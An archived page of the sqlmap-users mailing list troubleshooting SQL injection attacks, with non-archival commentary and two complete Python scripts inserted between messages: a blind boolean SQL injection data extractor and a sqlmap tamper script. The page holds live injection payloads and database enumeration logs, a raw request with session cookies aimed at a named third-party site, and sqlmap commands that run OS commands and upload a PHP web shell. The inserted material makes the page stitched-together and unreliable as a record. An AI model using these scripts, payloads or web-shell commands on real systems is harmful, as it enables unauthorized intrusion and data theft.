sqlmap-users Mailing List for sqlmap (Page 24)
Brought to you by:
inquisb
From: Brandon P. <bpe...@gm...> - 2014-03-30 13:49:15
FWIW --parse-errors also doesn't seem to affect the output during a scan on the URL.

On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry <bpe...@gm...> wrote:
> [...]

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2014-03-30 13:33:50
Hi,

I am playing around with an interesting SQL injection. A GET to a php script with two params (date1 and date2) will generate a PNG when successful, but will output a textual error message when, say, an apostrophe is thrown in one of the dates.

For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will result in a PNG.

GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in last param) will yield:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin' AND a.sid=i.sid and i.ref IN (SELECT ref from Itablet)' at line 4

GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result in a PNG

Since the result of a successful query is a PNG, I only expect to be able to use an error-based, or boolean/time-based attacks. However, sqlmap doesn't detect that either of the params are injectable (both are).

[06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic
[06:04:13] [WARNING] heuristic (basic) test shows that GET parameter 'date1' might not be injectable

I have tried using --text-only and am not using -o, but to no avail. Any thoughts on some tricks I can try to see if sqlmap will be able to exploit the injection points?

I can send a traffic file if that helps. Currently on latest.

bperry@ubuntu:~/tools/sqlmap$ git pull
Already up-to-date.
bperry@ubuntu:~/tools/sqlmap$

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
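The three observations in the message above (a PNG on a good query, a text error on a broken one, a PNG again when the injected condition is true) are a usable boolean oracle even though no query output ever reaches the page body: the signal is whether the response is an image at all. The script below is an added example, not part of the thread and not sqlmap code. It stands in for the PHP script with an in-memory SQLite database (so the error text differs from MySQL's), classifies each response by its PNG magic bytes, and uses that one bit per request to bisect a value out of the database. The schema, the table contents, and the assumption that a true-but-empty range yields a text message rather than a blank chart are all constructed for the example.

```python
import sqlite3

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def build_target():
    """Return a callable that mimics the vulnerable fdsa.php from the thread.

    Schema and rows are constructed for this example; SQLite replaces MySQL.
    The behaviour that matters is the same: PNG on success, text on error.
    """
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE stats(day TEXT, hits INTEGER);
        INSERT INTO stats VALUES ('2014-03-01', 10), ('2014-03-15', 20);
        CREATE TABLE users(name TEXT, pw TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
        """
    )

    def handler(date1, date2):
        # Vulnerable on purpose: both parameters are concatenated into the query.
        sql = f"SELECT day, hits FROM stats WHERE day BETWEEN '{date1}' AND '{date2}'"
        try:
            rows = db.execute(sql).fetchall()
        except sqlite3.OperationalError as exc:
            return "text/html", f"SQL error: {exc}".encode()
        if not rows:
            # Assumption for the example: an empty range gives text, not a blank chart.
            return "text/html", b"No data for the selected range"
        # Placeholder chart body: the oracle only looks at the magic bytes.
        return "image/png", PNG_MAGIC + b"<chart bytes elided>"

    return handler


def is_png(response):
    """Classify a response by its magic bytes, not by its text: that is the oracle."""
    _content_type, body = response
    return body.startswith(PNG_MAGIC)


def ask(handler, condition):
    """True iff injecting `condition` into date2 still yields a PNG."""
    payload = f"2014-03-30' AND ({condition}) AND '1'='1"
    return is_png(handler("2014-02-28", payload))


def infer_int(handler, expr, lo, hi):
    """Binary-search the integer value of SQL expression `expr` within [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(handler, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(handler, subquery, max_len=64):
    """Pull a scalar string out of the database one character at a time."""
    length = infer_int(handler, f"length({subquery})", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = infer_int(handler, f"unicode(substr({subquery}, {pos}, 1))", 0, 127)
        chars.append(chr(code))
    return "".join(chars)


def probe(handler):
    """Reproduce the thread's three observations as an injectability check."""
    baseline = is_png(handler("2014-02-28", "2014-03-30"))
    broken = handler("2014-02-28", "2014-03-30'")  # stray apostrophe -> SQL error
    return {
        "baseline_png": baseline,
        "apostrophe_errors": (not is_png(broken)) and b"SQL error" in broken[1],
        "boolean_oracle": ask(handler, "1=1") and not ask(handler, "1=2"),
    }


if __name__ == "__main__":
    target = build_target()
    print(probe(target))
    print("first user:", extract(target, "(SELECT name FROM users LIMIT 1)"))
```

`probe()` is the check to run first: if `boolean_oracle` comes back false the application returns a PNG for both outcomes and only the error channel (or timing) is left. Everything after that is ordinary bisection; against a real target each `ask()` would be wrapped with a retry and a re-check of the true and false reference responses, since the classification is a single bit per request.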
From: Visual Z. <nt...@gm...> - 2014-03-30 07:26:42
[15:19:32] [CRITICAL] unhandled exception in sqlmap/1.0-dev-e8c1c90, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.

sqlmap version: 1.0-dev-e8c1c90
Python version: 2.7.6
Operating system: posix
Command line: sqlmap.py -r about.txt -p title --dbs --dbms Microsoft SQL Server
Technique: TIME
Back-end DBMS: Microsoft SQL Server (fingerprinted)

Traceback (most recent call last):
  File "sqlmap.py", line 95, in main
    start()
  File "/Users/ihacku/tools/sqlmap-dev/lib/controller/controller.py", line 583, in start
    action()
  File "/Users/ihacku/tools/sqlmap-dev/lib/controller/action.py", line 106, in action
    conf.dumper.dbs(conf.dbmsHandler.getDbs())
  File "/Users/ihacku/tools/sqlmap-dev/plugins/generic/databases.py", line 120, in getDbs
    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
  File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 409, in getValue
    value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
  File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 278, in _goInferenceProxy
    outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
  File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 126, in _goInferenceFields
    output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field)
  File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 98, in _goInference
    count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)
  File "/Users/ihacku/tools/sqlmap-dev/lib/techniques/blind/inference.py", line 528, in bisection
    val = getChar(index, asciiTbl)
  File "/Users/ihacku/tools/sqlmap-dev/lib/techniques/blind/inference.py", line 258, in getChar
    forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
  File "/Users/ihacku/tools/sqlmap-dev/lib/core/common.py", line 1501, in safeStringFormat
    raise Exception("wrong number of parameters during string formatting")
Exception: wrong number of parameters during string formatting

and here's content of about.txt

POST /about17u/siteinfo/more_wzdt.asp HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.17u.net/
Cookie: b2b%5Fcn%5Fmember%5Finfo=iscookiesopen=2014%2D3%2D29+19%3A26%3A52&cityhomepageId=224; ASPSESSIONIDSQQDBRRT=DNONHMDDINFHGJHPMGGKAPIB; BIGipServerwww-17u-net-pool=2114064556.9475.0000; line=showType=0; refid=1365089; BIGipServernetmvc-pool=1426198700.9475.0000; HistoryAccessSource=101; ASP.NET_SessionId=w11yjefaeqbmq1dkfmbtwtlz; historylineId=4642727~%e3%80%90%e6%b8%85%e6%98%8e%e8%8a%82%e3%80%91_%e5%8f%8c%e5%8d%a7%e5%9b%9b%e6%97%a5_%e5%a9%ba%e6%ba%90%e3%80%81%e6%b1%9f%e5%b2%ad%e6%b2%b9%e8%8f%9c%e8%8a%b1%e3%80%81%e6%99%af%e5%be%b7%e9%95%87%e3%80%81%e6%80%a1%e6%83%85%e7%94%b0%e5%9b%ad%e7%ba%af%e7%8e%a9%e6%b8%b8_%e5%8c%97%e4%ba%ac%e5%88%b0%e5%a9%ba%e6%ba%90%e6%97%85%e6%b8%b8%e6%94%bb%e7%95%a5@4642464~%e6%b8%85%e6%98%8e%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e5%a4%a9%e6%b0%94_%e5%8e%a6%e9%97%a8%e5%88%b0%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e6%94%bb%e7%95%a5_%e5%8e%a6%e9%97%a8%e5%88%b0%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e4%bb%b7%e6%a0%bc@4632444~%e6%98%86%e6%98%8e%e5%88%b0%e6%b5%b7%e5%8d%97%e6%b5%b7%e5%8f%a3+%e8%b1%aa%e4%ba%ab%e3%80%81%e4%bc%91%e9%97%b2%e6%b8%b85%e5%a4%a9%e6%b8%b8@4429950~%e5%8d%81%e4%b8%80%e7%9f%b3%e5%ae%b6%e5%ba%84%e6%97%85%e8%a1%8c%e7%a4%be%e7%ba%bf%e8%b7%af%e5%ae%89%e6%8e%92-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8e%bb%e4%b8%8a%e6%b5%b7-%e6%9d%ad%e5%b7%9e-%e8%8b%8f%e5%b7%9e%e6%97%85%e6%b8%b8%e5%a4%9a%e5%b0%91%e9%92%b1-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8d%81%e4%b8%80%e5%9b%bd%e5%ba%86%e5%8e%bb%e6%97%85%e6%b8%b8@4429283~%e7%9f%b3%e5%ae%b6%e5%ba%84%e6%97%85%e8%a1%8c%e7%a4%be%e5%8d%81%e4%b8%80%e6%97%85%e6%b8%b8%e7%ba%bf%e8%b7%af%e6%8a%a5%e4%bb%b7-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8e%bb%e4%b9%9d%e5%af%a8%e6%b2%9f%e6%97%85%e6%b8%b8%e5%a4%9a%e5%b0%91%e9%92%b1-%e6%88%90%e9%83%bd%e3%80%81%e9%bb%84%e9%be%99%e3%80%81%e4%b9%9d%e5%af%a8%e6%b2%9f%e5%8f%8c%e9%a3%9e%e4%ba%94%e6%97%a5%e6%b8%b8; ASPSESSIONIDSQRDBQRS=KDBKIDEDPEBEHLHAIACMPAKL; NETSEInfo=RefId=1365089&SEFrom=&SEKeyWords=&RefUrl=; BIGipServerzuche-rujia365-com-pool=2550245568.20480.0000; B2bCnMemberLogStat=; sto-id-lvyou.17u.net_gs=JJAAKIMA; b2b%5Fcn%5Fmember%5Finfo=cityhomepageId=224&iscookiesopen=2014%2D3%2D29+19%3A41%3A21; latestEnquiryPage=1; latestQuotePage=1; ASPSESSIONIDQSQDARRS=LHGDJKEDGHACPAEKOBKAHILP; ASPSESSIONIDSSTDCTSQ=LJKPJBFDOBHKGEJDFPICJEEP; ASPSESSIONIDQQQDARRS=OLBLKIFDAJGDMMBHLDICCCNK
Host: www.17u.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

search=%cb%d1%20%cb%f7&title=1
From: Miroslav S. <mir...@gm...> - 2014-03-25 18:59:58
Strange thing is that you are not getting anything with --parse-errors as you are dealing with a "missing database" problem inlined with error-based technique. Can you please send a traffic file (if you want you can send it privately to me) for that same run (where you've used --parse-errors)?

Bye

On Tue, Mar 25, 2014 at 7:55 PM, Richard Whitcroft <rwh...@gm...> wrote:
> [...]

--
Miroslav Stampar
http://about.me/stamparm
From: Richard W. <rwh...@gm...> - 2014-03-25 18:55:53
Sure. The --parse-errors switch doesn't seem to produce anything additional? I added -v3 just in case.

--
$ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8 --fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3

sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:46:47

[14:46:47] [DEBUG] cleaning up configuration parameters
[14:46:47] [DEBUG] setting the HTTP timeout
[14:46:47] [DEBUG] setting the HTTP method to POST
[14:46:47] [DEBUG] creating HTTP requests opener object
[14:46:47] [DEBUG] forcing back-end DBMS to user defined value
[14:46:47] [INFO] testing connection to the target URL
[14:46:47] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ...
    Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
[14:46:47] [INFO] testing Sybase
[14:46:47] [PAYLOAD] rw8...@gm...' AND 6746=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea
[14:46:48] [WARNING] reflective value(s) found and filtering out
[14:46:48] [DEBUG] performed 1 queries in 0.47 seconds
[14:46:48] [INFO] confirming Sybase
[14:46:48] [PAYLOAD] rw8...@gm...' AND 6332=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO
[14:46:48] [DEBUG] performed 1 queries in 0.45 seconds
[14:46:48] [INFO] the back-end DBMS is Sybase
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Sybase
[14:46:48] [INFO] fetching tables for database: ENERGY_MASTER
[14:46:48] [PAYLOAD] rw8...@gm...' AND 5371=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET
[14:46:49] [DEBUG] performed 1 queries in 0.46 seconds
[14:46:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
No tables found
[14:46:49] [INFO] fetched data logged to text files under '/opt/sqlmap/output/xxx'

[*] shutting down at 14:46:49
--

$ python sqlmap.py ... --dbs

[14:50:13] [INFO] testing Sybase
[14:50:14] [WARNING] reflective value(s) found and filtering out
[14:50:14] [INFO] confirming Sybase
[14:50:14] [INFO] the back-end DBMS is Sybase
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Sybase
[14:50:14] [INFO] fetching database names
[14:50:14] [INFO] retrieved: 13
[14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name'
[14:50:15] [INFO] retrieved: 13
[14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row data
[14:50:15] [INFO] retrieved: AR1
[14:50:16] [INFO] retrieved: AR10
[14:50:16] [INFO] retrieved: AR100TST
[14:50:17] [INFO] retrieved: AR15
[14:50:17] [INFO] retrieved: AR710
[14:50:18] [INFO] retrieved: AR710TST
[14:50:18] [INFO] retrieved: ENERGY_MASTER
[14:50:19] [INFO] retrieved: master
[14:50:20] [INFO] retrieved: model
[14:50:20] [INFO] retrieved: olympus
[14:50:21] [INFO] retrieved: sybsystemdb
[14:50:21] [INFO] retrieved: sybsystemprocs
[14:50:22] [INFO] retrieved: tempdb

On 25 March 2014 14:22, Miroslav Stampar <mir...@gm...> wrote:
> [...]
From: Miroslav S. <mir...@gm...> - 2014-03-25 18:22:53
Hi.

Can you please copy/paste the console output you get for sqlmap run with:

python sqlmap.py ... -D ENERGY --tables --parse-errors

Also, for:

python sqlmap.py ... --dbs

Bye

On Mar 25, 2014 7:16 PM, "les paul" <rw8...@gm...> wrote:
> Hi all,
>
> I'm running into trouble with sqlmap against a Sybase db. Here's the fingerprint:
>
> Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010
>
> The technique I'm using is error-based through a POST to a vulnerable .aspx page. I am able to enumerate the master db, but not the user tables, which are what I want.
>
> $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah" --dbms=sybase --threads=8 --batch --technique=E -D master --tables
>
> This produces 58 tables, mostly sys* and some mon* which seem standard. I can dump the sysobjects table using -D and -T, etc.
>
> The web app is querying a database we'll call "ENERGY". If I try to "-D ENERGY --tables", I get "No tables found, try using --hex or --no-cast blahblah" (which don't work).
>
> I used -v4 to look closely at the requests, and see sqlmap is prefixing the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after experimenting I found doesn't work, so I wrote a small tamper script to strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names from the user tables (type='U'), but I'm still not able to get at the actual data/rows in the tables.
>
> I know it must be possible because the web app is definitely querying the tables to validate a login (this is a sqli vuln in a login form, heh).
>
> I'm not even sure this is really a bug in sqlmap - maybe something odd in the way the database is built or something. I just thought I'd ask in case anyone has had success using sqlmap against a similar Sybase db and has some tips or suggestions.
>
> Thanks for reading - I can provide more information if anyone's interested.
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their applications. Written by three acclaimed leaders in the field, this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
From: les p. <rw8...@gm...> - 2014-03-25 18:15:33
Hi all,

I'm running into trouble with sqlmap against a Sybase db. Here's the fingerprint:

Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010

The technique I'm using is error-based through a POST to a vulnerable .aspx page. I am able to enumerate the master db, but not the user tables, which are what I want.

$ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah" --dbms=sybase --threads=8 --batch --technique=E -D master --tables

This produces 58 tables, mostly sys* and some mon* which seem standard. I can dump the sysobjects table using -D and -T, etc.

The web app is querying a database we'll call "ENERGY". If I try to "-D ENERGY --tables", I get "No tables found, try using --hex or --no-cast blahblah" (which don't work).

I used -v4 to look closely at the requests, and see sqlmap is prefixing the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after experimenting I found doesn't work, so I wrote a small tamper script to strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names from the user tables (type='U'), but I'm still not able to get at the actual data/rows in the tables.

I know it must be possible because the web app is definitely querying the tables to validate a login (this is a sqli vuln in a login form, heh).

I'm not even sure this is really a bug in sqlmap - maybe something odd in the way the database is built or something. I just thought I'd ask in case anyone has had success using sqlmap against a similar Sybase db and has some tips or suggestions.

Thanks for reading - I can provide more information if anyone's interested.
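A tamper script of the kind described in the message above, written here as an added example: it is not the script the poster wrote and not part of sqlmap. It removes the `ENERGY..` and `ENERGY.dbo.` qualifiers that sqlmap prepends to catalog tables, so the object name resolves in the connection's current database instead. The shape (`__priority__`, `dependencies()`, `tamper(payload, **kwargs)`) is sqlmap's tamper-script interface; the database name comes from the thread, the sample payload is constructed after the one in the log, and the guarded import exists only so the file also runs outside sqlmap's tree. The file name `stripdbprefix.py` used in the note below is an assumption.

```python
import re

# Real tamper scripts take PRIORITY from sqlmap's own package. The fallback
# only makes this file importable stand-alone, outside the sqlmap tree.
try:
    from lib.core.enums import PRIORITY
except ImportError:  # not running inside sqlmap
    class PRIORITY:
        NORMAL = 0

__priority__ = PRIORITY.NORMAL

# Databases whose qualifier is dropped. "ENERGY" is the pseudonymous name
# from the thread; put the real name(s) here when using this.
DATABASES = ("ENERGY",)

# Matches "<db>.." and "<db>.dbo." immediately before an object name, e.g.
# "ENERGY..sysobjects" or "ENERGY.dbo.users". Deliberately restricted to the
# two forms sqlmap emits (no owner, or the default owner "dbo"), so that a
# three-part name with another owner is left alone.
_QUALIFIER = re.compile(
    r"\b(?:%s)\.(?:dbo)?\." % "|".join(re.escape(d) for d in DATABASES),
    re.IGNORECASE,
)

# Constructed after the error-based payload in the thread's log, with the
# catalog table qualified by the pseudonymous database name.
SAMPLE_PAYLOAD = (
    "' AND 5371=CONVERT(INT,(SELECT CHAR(113)+(SELECT ISNULL(CONVERT(VARCHAR(4000),"
    "COUNT(*)),CHAR(32)) FROM (SELECT name FROM ENERGY..sysobjects WHERE type IN "
    "(CHAR(85))) AS Legi)+CHAR(113))) AND 'idET'='idET"
)


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Strips "<db>.." and "<db>.dbo." qualifiers from the payload for the databases
    listed in DATABASES, so the object resolves in the login's current database.

    >>> tamper("SELECT name FROM ENERGY..sysobjects WHERE type IN (CHAR(85))")
    'SELECT name FROM sysobjects WHERE type IN (CHAR(85))'
    """
    return _QUALIFIER.sub("", payload) if payload else payload


if __name__ == "__main__":
    print(tamper(SAMPLE_PAYLOAD))
```

Dropped into sqlmap's `tamper/` directory as `stripdbprefix.py` it is selected with `--tamper=stripdbprefix`. The caveat is built into what it does: once the qualifier is gone, `sysobjects` or `users` is looked up in whatever database the application's login lands in, so this only helps when that is the database you are after (which matches the thread, where the same login validates users against those tables). Queries against `master..sysobjects` are untouched because `master` is not in `DATABASES`.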
From: Brandon P. <bpe...@gm...> - 2014-03-21 18:26:51
I did not read your first email, so ignore my blitherings :)

On Fri, Mar 21, 2014 at 1:16 PM, Brandon Perry <bpe...@gm...> wrote:
> Brian,
>
> I expect the program is taking the input for username and truncating it, so ZAP sees the injection going in and a successful auth afterwards and assumes the payload worked. I think this is a poor assumption to make.
>
> On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar <mir...@gm...> wrote:
>> There is always a 302 redirect, so I am not sure how ZAP detected this as a SQLi.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote:
>>> Thanks for the quick response, Miroslav and Bernardo. It's very much appreciated! There is a UNION technique that is being reported by ZAP, but sqlmap isn't finding it and I haven't quite figured out how to simply tell it what to use explicitly. ZAP detects a UNION vulnerability on activate.php:
>>>
>>> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>>>
>>> My attempts to input this have not been successful, so I'm not sure if it's a false positive or I'm not using sqlmap quite right (more likely).
>>>
>>> CMDLINE
>>> sqlmap -u "http://172.16.71.138:7879/activate.php" --data='act=auth-login&page=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL select NULL --"
>>>
>>> As for the previous method, here's the attached file (on screen output was massive - password is "password"). End result "[09:01:51] [CRITICAL] all tested parameters appear to be not injectable. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')"
>>>
>>> Thanks for the help!
>>>
>>> Brian
>>>
>>> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
>>>> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> wrote:
>>>> > [...]
>>>> > All in all, can you please relaunch sqlmap (make sure you run git pull first to sync to the GitHub repository) with the following syntax:
>>>>
>>>> Command line:
>>>>
>>>> python sqlmap.py -u "http://172.16.71.138:7879/index.php" --data="act=auth-login&pag=login&username=admin&password=admin" -p username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 --parse-errors -t traffic.log --answers "language does the web server support=4,do you want to use for writable=2,comma separate list of absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>>>
>>>> Feel free to report back the result, the entire standard output of sqlmap and send me the traffic.log.
>>>>
>>>> Thank you.
>>>> Bernardo
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2014-03-21 18:16:25
|
Brian, I expect the program is taking the input for username and truncating it, so ZAP sees the injection going in and a successful auth afterwards and assumes the payload worked. I think this is a poor assumption to make. On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar < mir...@gm...> wrote: > There is always a 302 redirect, so I am not sure how ZAP detected this as > a SQLi. > > Kind regards, > Miroslav Stampar > > > On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote: > >> Thanks for the quick response, Miroslav and Bernardo. It's very much >> appreciated! There is a UNION technique that is being reported by ZAP, but >> sqlmap isn't finding it and I haven't quite figured out how to simply tell >> it what to use explicitly. ZAP detects a UNION vulnerability on >> activate.php: >> >> >> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP" >> >> My attempts to input this have not been successful, so I'm not sure if >> it's a false positive or I'm not using sqlmap quite right (more likely) . >> >> CMDLINE >> sqlmap -u "http://172.16.71.138:7879/activate.php" >> --data='act=auth-login&page=login&username=admin&password=admin' -p >> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL >> select NULL --" >> >> As for the previous method, here's the attached file (on screen output >> was massive - password is "password"). End result "[09:01:51] [CRITICAL] >> all tested parameters appear to be not injectable. Also, you can try to >> rerun by providing either a valid value for option '--string' (or >> '--regexp')" >> >> Thanks for the help! >> >> Brian >> >> >> >> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. < >> ber...@gm...> wrote: >> >>> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> >>> wrote: >>> > [...] 
>>> > All in all, can you please relaunch sqlmap (make sure you run git pull >>> > first to sync to the GitHub repository) with the following syntax: >>> >>> Command line: >>> >>> python sqlmap.py -u "http://172.16.71.138:7879/index.php" >>> --data="act=auth-login&pag=login&username=admin&password=admin" -p >>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 >>> --parse-errors -t traffic.log --answers "language does the web server >>> support=4,do you want to use for writable=2,comma separate list of >>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" >>> >>> Feel free to report back the result, the entire standard output of >>> sqlmap and send me the traffic.log. >>> >>> Thank you. >>> Bernardo >>> >> >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... 
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
From: Miroslav S. <mir...@gm...> - 2014-03-21 18:11:59
|
There is always a 302 redirect, so I am not sure how ZAP detected this as a SQLi. Kind regards, Miroslav Stampar On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote: > Thanks for the quick response, Miroslav and Bernardo. It's very much > appreciated! There is a UNION technique that is being reported by ZAP, but > sqlmap isn't finding it and I haven't quite figured out how to simply tell > it what to use explicitly. ZAP detects a UNION vulnerability on > activate.php: > > > "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP" > > My attempts to input this have not been successful, so I'm not sure if > it's a false positive or I'm not using sqlmap quite right (more likely) . > > CMDLINE > sqlmap -u "http://172.16.71.138:7879/activate.php" > --data='act=auth-login&page=login&username=admin&password=admin' -p > "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL > select NULL --" > > As for the previous method, here's the attached file (on screen output was > massive - password is "password"). End result "[09:01:51] [CRITICAL] all > tested parameters appear to be not injectable. Also, you can try to rerun > by providing either a valid value for option '--string' (or '--regexp')" > > Thanks for the help! > > Brian > > > > On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. < > ber...@gm...> wrote: > >> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> >> wrote: >> > [...] 
